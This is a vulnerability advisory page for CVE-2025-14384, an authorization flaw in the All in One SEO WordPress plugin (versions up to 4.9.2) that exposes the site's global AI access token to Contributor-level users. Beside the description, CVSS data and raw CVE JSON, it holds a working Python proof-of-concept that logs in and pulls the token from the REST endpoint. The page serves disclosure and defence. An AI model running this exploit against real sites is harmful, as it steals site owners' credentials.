Security Vulnerability Report
中文
CVE-2025-14384 CVSS 4.3 MEDIUM

CVE-2025-14384

Published: 2026-01-16 05:16:12
Last Modified: 2026-04-15 00:35:42

Description

The All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/aioseo/v1/ai/credits` REST route in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disclose the global AI access token.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

All in One SEO Plugin <= 4.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14384 PoC - All in One SEO Plugin Unauthorized AI Token Access # Target: WordPress site with All in One SEO plugin <= 4.9.2 def exploit_aioseo_token_disclosure(target_url, username, password): """ Exploit the missing capability check on /aioseo/v1/ai/credits REST endpoint Requires Contributor-level access or higher """ session = requests.Session() # Step 1: Authenticate with WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Request the vulnerable REST endpoint api_url = f"{target_url}/wp-json/aioseo/v1/ai/credits" headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': session.cookies.get('wordpress_test_cookie') or '' } resp = session.get(api_url, headers=headers) if resp.status_code == 200: print(f"[+] Request successful - Status: {resp.status_code}") print(f"[+] Response: {resp.text}") # Extract token from response try: data = resp.json() if 'data' in data and 'accessToken' in data['data']: token = data['data']['accessToken'] print(f"[!] AI Access Token Leaked: {token}") return token except: pass return resp.json() else: print(f"[-] Request failed - Status: {resp.status_code}") return None if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com contributor password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_aioseo_token_disclosure(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14384", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:11.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `/aioseo/v1/ai/credits` REST route in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disclose the global AI access token."}, {"lang": "es", "value": "El plugin All in One SEO – Powerful SEO Plugin a Boost SEO Rankings &amp; Increase Traffic para WordPress es vulnerable a acceso no autorizado a datos debido a una falta de verificación de capacidad en la ruta REST `/aioseo/v1/ai/credits` en todas las versiones hasta la 4.9.2 (inclusive). Esto permite a atacantes autenticados, con acceso de nivel Colaborador y superior, divulgar el token de acceso global de IA."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3435276/all-in-one-seo-pack", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f47d53e1-42ac-425e-a6f2-901a6d26845d?source=cve", "source": "[email protected]"}]}}